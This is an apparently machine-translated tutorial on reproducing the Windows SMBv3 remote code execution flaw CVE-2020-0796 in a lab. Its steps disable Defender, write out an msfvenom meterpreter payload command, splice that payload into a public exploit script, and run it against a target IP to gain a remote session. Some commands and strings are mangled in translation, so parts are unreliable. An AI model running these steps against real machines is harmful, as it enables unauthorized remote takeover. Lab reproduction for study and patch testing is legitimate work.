Shulou(Shulou.com)05/31 Report--

What this article shares with you is about how to reproduce the CVE-2020-0796 loophole. The editor thinks it is very practical, so I share it with you to learn. I hope you can get something after reading this article.

I. introduction of loopholes

The Microsoft Server message Block (SMB) protocol is a Microsoft network file sharing protocol used in Microsoft Windows. It is enabled by default in most windows systems and is used to share files, printers, etc., between computers. Windows 10 and Windows Server 2016 introduced SMB 3.1.1. This vulnerability is due to the fact that SMBv3 does not correctly handle compressed packets and does not check whether the length is legal when decompressing the packet using the length passed by the client, which eventually leads to integer overflow. By using this vulnerability, hackers can directly remotely attack the SMB server to execute arbitrary malicious code remotely, and can also construct a malicious SMB server to induce client connections to attack the client on a large scale.

Scope of influence:

Windows 10 Version 1903 for 32-bit SystemsWindows 10 Version 1903 for x64-based SystemsWindows 10 Version 1903 for ARM64-based SystemsWindows Server, Version 1903 (Server Core installation) Windows 10 Version 1909 for 32-bit SystemsWindows 10 Version 1909 for x64-based SystemsWindows 10 Version 1909 for ARM64-based SystemsWindows Server, Version 1909 (Server Core installation)

Second, the preparation of vulnerability recurrence environment:

Kali system ip:172.16.0.27

The attacked machine win10 system ip:172.16.0.29 win10 system affected by this vulnerability, and install the win10 system with python3.6.x. What I use here is (copy the link below to download) ed2k:// | file | cn_windows_10_business_editions_version_1903_updated_sept_2019_x64_dvd_2f5281e1.iso | 5231140864 | B1D5C 4C print 401036B0B1EBA64476A95F338 | / (remove the watermark)

Ps: turn off defender Firewall

Reproduce steps:

1. To check the Windows version of the environment, press win+r and enter it in the pop-up window.

View version information

2. Use the tool to detect whether there is a loophole in the target machine. The download address of the testing tool, the https://github.com/ollypwn/SMBGhost running result, is shown below, which proves that the target machine has this loophole.

3. Kali uses msf to generate Trojans and check whether msfvenom-p windows/x64/meterpreter/bind_tcp LPORT=4444-b'\ x00'-I 1-f python > exploit has been successfully generated.

4. Download poc, replace the generated code generated by exploit.py with the USER_PAYLOAD parameter of exploit.py, and change the parameter buf to USER_PAYLOAD.

5. Run poc:python3.6 exploit.py-ip xx.xx.xx.xx (if an error occurs, physical read primitive failed! Run several more times)

6. Start msf to listen on the local port to gain the permission of the target machine, and the attack succeeds (if run fails, run will occur several times)

The above is how to reproduce the CVE-2020-0796 loophole. The editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.